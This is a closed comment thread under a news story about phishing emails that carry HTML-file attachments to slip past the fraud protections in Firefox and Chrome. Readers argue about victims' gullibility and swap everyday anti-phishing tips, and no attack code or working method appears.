back to article Phishers dodge fraud protections in Firefox, Chrome

A recent round of phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez, the locally stored file opens a web form that collects the customers …


This topic is closed for new posts.
  1. Anonymous South African Coward Bronze badge

    Function PhisherPumper();

    Isn't there any way to have some application pump said phising site full of random gibberish?

    I reckon if we pump some phishing DB's full of absolute useless rubbish, then it'll be harder for them to get proper, working credentials...

    1. David 164

      Someone did do this once upon a time but

      This approach was use a few years ago against spammers, it was declared illegal in several countries. As is vigilantism is general forbidden.

  2. Elmer Phud
    IT Angle

    hang on a min

    People get an email and fill in a form that comes with it?

    They don't go to the website and check it's a secure link before filling in personal details instead?

    They don't check where the form is going?

    Ah well.

    1. John Riddoch

      Simple answer...

      Many of the most important dilemmas of life become simple when you realise a basic truth - "People are stupid."

      For as long as there are idiots who blindly trust these kinds of forms, there will be people who will try to scam them.

      1. Anonymous Coward

        @simple answer

        I hate ignorant people such as yourself.

        People are not stupid, people are trusting, it's part of our makeup for 10's of thousands of years and it's what allows us to progress.

        When you take your car to a garage for repairs you trust that they won't cut you brake lines and jam your throttle on when it gets to 4000rpm. What you don't check these when you pick it up?

        You buy a burger presuming some hasn't crapped on it. What you don't open it and examine it in detail, is that really mayo?

        You buy a ladder presuming than all the rungs are securly attached. What you don't check them before climbing it?

        You open a email from Bank of XXXXX and you presume it is from them.

        They are not stupid, they just are not aware of the risks, big difference.

        1. Marcelo Rodrigues

          And ignorant people as yourself? Do You hate them too?

          Stupid people are trusting, not the other way around.

          I don´t trust they will not cut my brakes. I HOPE they will not do it. I BELIEVE they will not do it - basically because they would be caught after the third death in a row.

          By the same logic, I BELIEVE my burger is crap-free when I buy it from a reputable place. Because You can´t keep a business wich sells bad food every now and then. Because, You see, your customers (ex-customers, should I say?) would be not very happy.

          And I DO check a ladder before buying it. Don´t You?

          And make up your mind. Do I know this email is from Bank DDD or not? Because, You see, this only works if the email isn´t - and You think it is.

          So, Yes. They are stupid. Either because they know how to tell one email from the other - and failed - or because they don´t know that they don´t know how to tell one email from the other, and choose to click the same way.

          One is not stupid because of his/her ignorance. One is stupid when he/she doesn´t know that he/she doesn´t know.

          Terminator, because he knows how to do what he was supposed to.

        2. Dave Murray

          People are stupid

          I see it every day.

          In the case of phishing emails there is one simple rule that will protect you - DO NOT USE A LINK IN AN EMAIL TO LOG IN TO ANYTHING THAT COULD COST YOU MONEY. Always open your browser and visit the site using a bookmark or a Google/Bing search. ALWAYS.

          Anyone with half a brain should realise that often emails from banks are not legit by the number they recieve from banks that they are not customers of. But, most are too busy thinking about football, celebrities or the state of their fake tan to pay attention.

          1. Ammaross Danan


            "visit the site using a bookmark or a Google/Bing search."

            With blackhat SEO (search-engine optimization for those not-in-the-know), it's very easy to get a site near the top (if not THE top) of Google or Bing that even appears to be the site you are looking for. Even the "URL" displayed below (shown in green on Google) does not display the actual URL of the site. I've stumbled upon these myself.

            The best way to visit Bank of America or the like? Type: "" into your address bar. If you've got a decent browser, it will DNS resolve and take you straight to their website. If you don't, it might land you on a Google page with BoA as the first link, hopefully. (those that just typed "bank of america")

  3. MistoRoboto

    You could say...

    you can't just zap one. :-D

  4. bex

    this is not new

    I have seen this sort of thing for years , its hardly new

  5. Richard Porter
    Black Helicopters

    Don't use html messages

    "few PHP URLs get reported as abusive by most end users because of the technical expertise that's required. With not visible HTML accompanying them, there's little for the average user to go on."

    Phishing scams start with email messages that tempt you to open web pages, whether local, on some compromised computer or on the scammer's server. The number one rule should be never to read html messages, even if that means not using webmail services. Use a decent email client like Messenger Pro that allows you to work in plain text, and strips out the markup in html-only messages. You can also view the raw message if you want to. If you can see what the link URLs actually are then it is usually obvious when they are malign (but watch out for small spelling alterations in domain names). I have recently received several phishing messages that post forms to .ru addresses although they purport to come from UK banks.

  6. SuperTim

    spam filter?

    these things are immediately filtered out by most spam filters, so unless you go out of your way to open the email (already identified as spam) you will have a job falling foul of these attacks. That said, there are some incredibly naive people out there who have no idea that this sort of thing happens. Poor loves

  7. doperative

    phishing attacks defeat Firefox and Chrome

    > A recent round of phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email.

    Do these phishing attacks work on the Mac or Linux, or with scripting disabled in your email application and can I have a link to a working demo ?

    1. Panix

      No thanks

      Nerds don't have money in the bank. All their money is in Star Trek and Tux dolls. Why target a group where you can't "cesh out big."

    2. Aaron Em

      Do your own homework, script kiddie

      srsly 0/10

This topic is closed for new posts.

Other stories you might like